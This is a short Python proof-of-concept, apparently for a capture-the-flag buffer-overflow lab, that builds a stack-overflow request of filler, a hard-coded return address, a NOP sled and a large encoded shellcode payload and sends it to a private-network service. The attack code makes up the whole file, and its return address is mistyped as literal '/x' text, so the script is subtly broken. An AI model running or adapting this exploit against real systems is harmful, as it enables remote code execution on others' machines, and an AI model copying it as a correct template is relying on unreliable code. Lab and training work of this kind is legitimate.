@an0th3rhuman
Created February 13, 2021 07:02
Overflow 2 exploit code
import socket
# Builds the single request line that this proof-of-concept sends to a lab
# service. The pieces are concatenated in this order:
#   prefix | filler | retn | padding | buf | postfix
# Judging by the names, this is the classic layout for overwriting a saved
# return address on the stack. The page does not show the target program.

# Target of the connection: 10.0.0.0/8 is private (RFC 1918) address space.
ip = "10.10.172.142"
port = 1337
# Command keyword that starts the line; presumably what the service parses
# before copying the argument. TODO confirm against the target.
prefix = "OVERFLOW2 "
# Number of filler characters placed before `retn`. Presumably measured for one
# specific build of the target; it would not carry over to another binary.
offset = 634
overflow = "A" * offset
# Value placed directly after the filler; the name suggests it stands in for
# the overwritten return address. A hard-coded value only makes sense against a
# module loaded at a predictable address, which is what ASLR removes.
retn = "/xDF/x11/x50/x62"
# 0x90 is the x86 NOP opcode; sixteen of them sit between `retn` and the payload.
# NOTE(review): a long single-character run followed by a run of 0x90 is a
# pattern network IDS signatures commonly match on.
padding = "\x90" *16
# Opaque payload bytes, reproduced exactly as published. Most of them fall in
# the printable ASCII range, which suggests encoder output. The page does not
# say what the payload does or how it was generated, so treat it as untrusted.
buf = b""
buf += b"\x89\xe6\xdb\xcb\xd9\x76\xf4\x58\x50\x59\x49\x49\x49"
buf += b"\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43"
buf += b"\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41"
buf += b"\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42"
buf += b"\x58\x50\x38\x41\x42\x75\x4a\x49\x6b\x4c\x68\x68\x4d"
buf += b"\x52\x57\x70\x35\x50\x73\x30\x51\x70\x6b\x39\x68\x65"
buf += b"\x56\x51\x6f\x30\x30\x64\x4c\x4b\x72\x70\x34\x70\x6c"
buf += b"\x4b\x66\x32\x54\x4c\x4c\x4b\x30\x52\x47\x64\x4c\x4b"
buf += b"\x63\x42\x35\x78\x34\x4f\x6c\x77\x53\x7a\x61\x36\x75"
buf += b"\x61\x49\x6f\x6c\x6c\x77\x4c\x33\x51\x33\x4c\x74\x42"
buf += b"\x44\x6c\x77\x50\x6a\x61\x38\x4f\x64\x4d\x53\x31\x39"
buf += b"\x57\x59\x72\x38\x72\x73\x62\x53\x67\x4e\x6b\x50\x52"
buf += b"\x36\x70\x6e\x6b\x32\x6a\x57\x4c\x4e\x6b\x32\x6c\x34"
buf += b"\x51\x72\x58\x49\x73\x37\x38\x66\x61\x4e\x31\x46\x31"
buf += b"\x6e\x6b\x30\x59\x61\x30\x63\x31\x49\x43\x6e\x6b\x32"
buf += b"\x69\x46\x78\x59\x73\x77\x4a\x50\x49\x4c\x4b\x35\x64"
buf += b"\x6c\x4b\x35\x51\x5a\x76\x70\x31\x59\x6f\x4c\x6c\x4b"
buf += b"\x71\x7a\x6f\x76\x6d\x55\x51\x59\x57\x67\x48\x6b\x50"
buf += b"\x73\x45\x38\x76\x66\x63\x33\x4d\x6a\x58\x37\x4b\x51"
buf += b"\x6d\x31\x34\x51\x65\x6b\x54\x30\x58\x4e\x6b\x31\x48"
buf += b"\x61\x34\x65\x51\x5a\x73\x35\x36\x6e\x6b\x76\x6c\x72"
buf += b"\x6b\x4c\x4b\x63\x68\x55\x4c\x47\x71\x6e\x33\x4c\x4b"
buf += b"\x35\x54\x6e\x6b\x56\x61\x78\x50\x4b\x39\x63\x74\x57"
buf += b"\x54\x36\x44\x33\x6b\x33\x6b\x55\x31\x56\x39\x73\x6a"
buf += b"\x73\x61\x79\x6f\x6d\x30\x51\x4f\x73\x6f\x43\x6a\x4c"
buf += b"\x4b\x35\x42\x7a\x4b\x6c\x4d\x73\x6d\x63\x58\x70\x33"
buf += b"\x30\x32\x37\x70\x75\x50\x51\x78\x73\x47\x53\x43\x45"
buf += b"\x62\x53\x6f\x42\x74\x72\x48\x70\x4c\x64\x37\x65\x76"
buf += b"\x34\x47\x4b\x4f\x48\x55\x48\x38\x5a\x30\x57\x71\x63"
buf += b"\x30\x67\x70\x31\x39\x48\x44\x76\x34\x36\x30\x52\x48"
buf += b"\x56\x49\x4f\x70\x72\x4b\x55\x50\x69\x6f\x48\x55\x32"
buf += b"\x70\x46\x30\x76\x30\x70\x50\x51\x50\x66\x30\x33\x70"
buf += b"\x72\x70\x30\x68\x69\x7a\x34\x4f\x69\x4f\x59\x70\x59"
buf += b"\x6f\x4a\x75\x6f\x67\x70\x6a\x54\x45\x51\x78\x35\x5a"
buf += b"\x45\x58\x71\x42\x36\x6c\x62\x48\x73\x32\x67\x70\x72"
buf += b"\x31\x33\x6c\x4b\x39\x4a\x46\x70\x6a\x74\x50\x36\x36"
buf += b"\x33\x67\x45\x38\x6e\x79\x39\x35\x64\x34\x70\x61\x39"
buf += b"\x6f\x6a\x75\x4d\x55\x4b\x70\x73\x44\x56\x6c\x49\x6f"
buf += b"\x52\x6e\x47\x78\x52\x55\x4a\x4c\x70\x68\x48\x70\x6d"
buf += b"\x65\x49\x32\x32\x76\x4b\x4f\x7a\x75\x45\x38\x63\x53"
buf += b"\x72\x4d\x61\x74\x47\x70\x6b\x39\x6a\x43\x32\x77\x61"
buf += b"\x47\x51\x47\x56\x51\x39\x66\x42\x4a\x46\x72\x51\x49"
buf += b"\x63\x66\x78\x62\x6b\x4d\x31\x76\x7a\x67\x71\x54\x76"
buf += b"\x44\x55\x6c\x35\x51\x45\x51\x4e\x6d\x31\x54\x34\x64"
buf += b"\x56\x70\x69\x56\x67\x70\x50\x44\x31\x44\x50\x50\x52"
buf += b"\x76\x72\x76\x43\x66\x73\x76\x76\x36\x50\x4e\x50\x56"
buf += b"\x43\x66\x53\x63\x46\x36\x75\x38\x61\x69\x4a\x6c\x75"
buf += b"\x6f\x6d\x56\x6b\x4f\x39\x45\x6d\x59\x39\x70\x70\x4e"
buf += b"\x50\x56\x50\x46\x49\x6f\x70\x30\x55\x38\x75\x58\x4f"
buf += b"\x77\x57\x6d\x45\x30\x69\x6f\x78\x55\x4f\x4b\x79\x70"
buf += b"\x37\x6d\x44\x6a\x46\x6a\x31\x78\x6e\x46\x6f\x65\x4f"
buf += b"\x4d\x4d\x4d\x39\x6f\x6a\x75\x57\x4c\x57\x76\x43\x4c"
buf += b"\x46\x6a\x4d\x50\x49\x6b\x59\x70\x32\x55\x65\x55\x4d"
buf += b"\x6b\x42\x67\x47\x63\x50\x72\x52\x4f\x51\x7a\x67\x70"
buf += b"\x62\x73\x49\x6f\x6b\x65\x41\x41"
# Nothing is appended after the payload.
postfix = ""
# NOTE(review): str and bytes literals are mixed in this concatenation, so it
# only evaluates where b"..." is an ordinary str (Python 2 semantics).
buffer = prefix + overflow + retn + padding + buf + postfix
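# Open one TCP connection to (ip, port), send the assembled line, and report
# the outcome on stdout.
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
    s.connect((ip, port))
    print("Sending evil buffer...")
    # CRLF is appended as the line terminator.
    s.send(buffer + "\r\n")
    print("Done!")
except socket.error:
    # Only network-level failures are reported here. The original bare
    # `except:` also hid programming errors and Ctrl-C behind this message.
    print("Could not connect.")
finally:
    # Close the socket on every path so the descriptor is not leaked.
    s.close()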